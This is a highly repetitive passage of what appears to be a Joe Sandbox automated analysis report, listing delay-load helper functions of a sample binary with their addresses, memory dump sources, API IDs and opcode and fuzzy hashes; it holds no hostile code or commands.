                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 4de8c10f10d3f13712c49273eabee6436ee67efd88a2e8b692a289db40cb932a
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: 4de8c10f10d3f13712c49273eabee6436ee67efd88a2e8b692a289db40cb932a
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        Function 00EAE2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 9b63004ee8592e51d0d7d8d4263e584ca20af5852556f0055c4d26b6fba12c23
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: 9b63004ee8592e51d0d7d8d4263e584ca20af5852556f0055c4d26b6fba12c23
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        Function 00EAE2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 4f0ac1be3ab95d75c7d2438e6e984b2764250bf5ca6b22b8ac781ccd8fb4457d
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: 4f0ac1be3ab95d75c7d2438e6e984b2764250bf5ca6b22b8ac781ccd8fb4457d
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        Function 00EAE2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: f0b05794114c78698d10a133eec646de909448145949f36a50fc95b8b05167db
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: f0b05794114c78698d10a133eec646de909448145949f36a50fc95b8b05167db
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        Function 00EAE2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 012bc5f73cc41d3ada5ded622e4d55f496e86bd78256f34779b978fb8b65d0cd
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: 012bc5f73cc41d3ada5ded622e4d55f496e86bd78256f34779b978fb8b65d0cd
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        Function 00EAE2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: b2c5970bd998600230796ca49dd1eff99171268cba7a6a95bada341e19ef543d
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: b2c5970bd998600230796ca49dd1eff99171268cba7a6a95bada341e19ef543d
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        Function 00EAE29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: a7d67bc9111c3325c333d3ae6978d78da437328fe68384033487042623c1124f
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: a7d67bc9111c3325c333d3ae6978d78da437328fe68384033487042623c1124f
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        Function 00EAE291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: acdf619873fd6a241a7e3beff4604791c9884c7d7322b57f185e0b64962f4ae0
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: acdf619873fd6a241a7e3beff4604791c9884c7d7322b57f185e0b64962f4ae0
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        Function 00EAE27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: f39bce5581a9281d4088ebe1511ee26cc187696e249f67bc9440584b86bc0cd2
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: f39bce5581a9281d4088ebe1511ee26cc187696e249f67bc9440584b86bc0cd2
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        Function 00EAE25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 52c11ed6829c5c33484e907dbdb10389e397b577eb63b5a8e840219c02e76b6e
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: 52c11ed6829c5c33484e907dbdb10389e397b577eb63b5a8e840219c02e76b6e
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        Function 00EAE219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: ca77f8b249ebc499ce56988b2ab4c924e9ef63ef7c67ec9af44c700b6cfedc90
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: ca77f8b249ebc499ce56988b2ab4c924e9ef63ef7c67ec9af44c700b6cfedc90
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        Function 00EAE5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE580
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: Fjun
                                                                                                                        • API String ID: 1269201914-1717936292
                                                                                                                        • Opcode ID: 4b0bc8681fc3db66b5874b4f64b0d248a4d8be9b6ff4417b868b088e4523fc39
                                                                                                                        • Instruction ID: 80cc51831a10bad9f8b78b9a6719493c26cc2b495b11b81cf5a682b3cff65970
                                                                                                                        • Opcode Fuzzy Hash: 4b0bc8681fc3db66b5874b4f64b0d248a4d8be9b6ff4417b868b088e4523fc39
                                                                                                                        • Instruction Fuzzy Hash: DCA011C2AA8202BC300C22A02E02C3B020CC0CAF28330B82EF80AA8280A88028020830
                                                                                                                        Function 00EAE58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE580
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: Fjun
                                                                                                                        • API String ID: 1269201914-1717936292
                                                                                                                        • Opcode ID: bd365a2724fe982889efe46ad50a979baf02c7f33a03d6725c3595f445e6b4a2
                                                                                                                        • Instruction ID: 80cc51831a10bad9f8b78b9a6719493c26cc2b495b11b81cf5a682b3cff65970
                                                                                                                        • Opcode Fuzzy Hash: bd365a2724fe982889efe46ad50a979baf02c7f33a03d6725c3595f445e6b4a2
                                                                                                                        • Instruction Fuzzy Hash: DCA011C2AA8202BC300C22A02E02C3B020CC0CAF28330B82EF80AA8280A88028020830
                                                                                                                        Function 00EAE569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
